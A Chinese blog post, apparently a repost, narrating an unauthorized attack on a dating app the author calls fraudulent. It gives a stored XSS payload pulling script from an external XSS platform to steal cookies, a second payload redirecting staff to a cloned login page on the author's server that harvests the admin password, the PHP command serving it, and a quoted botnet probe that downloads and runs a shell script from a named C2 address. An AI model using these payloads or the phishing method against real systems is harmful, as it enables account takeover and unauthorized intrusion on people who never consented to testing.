安全测试某非法约X软件

  • 内容
  • 相关

前言

发生疫情闲着无聊寂寞(这不是重点),去应用市场上下载了某个同城约x软件,点开软件,首先不需要登录/注册就可以进来。。就感觉发现有问题了。

1.png

主界面是长这样的,类似探探一样可以选择心动或者忽略,忽略之后就会蹦出下一个女生的照片:

2.jpg

瞎划几下,就有一堆女的找我聊天,直觉告诉我这肯定是机器人:

3.jpg

注入点 在设置中心 -> 反馈建议处插入 xss payload:

4.png

<script src=https://xss.admin401.com></script>

接收 cookie 信息

Admin401团队XSS平台地址:https://xss.admin401.com/

很快就可以接收到一些 cookie 信息,但是点开之后发现少了 JSESSIONID,无法直接登录到后台:

5.jpg

很显然是开启了 http-only:

6.jpg

访问一下页面:

7.png

弱口令尝试了登录不了。。爆破也没有结果,也不存在注入点。
遇到这种情况一种是两种思路:绕过 http-only 或者构造钓鱼网站,让受害者去输入账号和密码。这里我选择了后者。

构造钓鱼页面

首先构造一个和登录界面一样的页面,将源码的 js、css 下载放在本地即可。

8.jpg

将登录处的代码的 action 改成当前目录下的 get_data.php 文件用来接收账号和密码:

9.jpg

get_data.php:

10.png

接着只要构造 xss payload:

<script>window.location.href="http://xxxxxx:8080/login.html"</script>
(xxxxxx 是我自己的 vps 服务器)
使用 php 开一个 web 服务即可:
php -S 0.0.0.0:8080 -t ./
最后的效果是这样的,报一个登录超时,让受害者重新输入密码,注入完了密码之后,重新跳转回原来正常的登录页面:

11.jpg

等待输入

将 xss payload 插入反馈的页面,之后等待输入即可。

12.png

客服早上 10 点才上班,我大概 9 点多的时候开启了服务,这里比较好玩的是我还抓到了别的东西:

13.jpg

一个美国的 ip 访问了我的服务,是一个比较奇怪的链接,仔细一看这个就是抓肉鸡的链接:

shell?cd+/tmp;wget+http:/\/185.62.188.45/jaws.sh+-O+-+>.ske.sh;chmod+777+.ske.sh;sh+.ske.sh

搜索了一下 jaws ,这个是摄像头的一个牌子,  在 1.0 版本下的     /shell 路径存在一个命令执行漏洞,很显然这个就是批量抓肉鸡了。C2C 服务器是 185.62.188.45。

上钩

我就等啊等,到 9.58 的时候,发现那边已经访问了我的链接,应该是客服准时上班了,但是他过了几分钟也没有点击登录进来,一直在登录界面观望(没有访问 get_data.php 说明他没有输入密码),我就觉得他应该是起了疑心了吧。。。

14.jpg

正在我准备放弃的时候,我发现有另外一个 IP 访问了我的服务器,而且还输入了密码(怀疑这里是他发现登录不上的时候询问了管理员,管理员一顿操作直接看也不看就登录上)!!赶紧看看日志:

15.jpg

激动的发现就是 admin 账号!

16.png

登录后台拿到账号密码赶紧登录一波,看了一下果然是最高管理员的权限,并且菜单的功能还挺多的:

17.jpg

先习惯性看一下用户反馈,果然不出所料,肯定是一堆机器人。。。这不坑骗广大男同胞吗?

18.jpg

下面的一些截图也可以证明查询机器人的数量 11089:

19.jpg

正常女性用户这里是 115 名,而且不包括男性朋友选择了女性角色的情况,所以这里至少 90% 是机器人,毋庸置疑了:

20.jpg

另外还有一些让人惊讶的地方:
这是从 25 号凌晨开始到 10 点多的订单总额,50w!!!

21.jpg

要想不再寂寞,那就赶紧处个对象

文章来自星盟安全

本文标签:

收录状态:百度√[百度已收录]丨360×[360未收录]丨搜狗√[搜狗已收录]

版权声明:若无特殊注明,本文皆为《Mracat》原创,转载请保留文章出处。

本文链接:安全测试某非法约X软件 - https://mracat.com/290.html

本文短域名链接:

用手机扫描访问本文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

请勿乱用他人邮箱,否者您将收不到最新动态消息~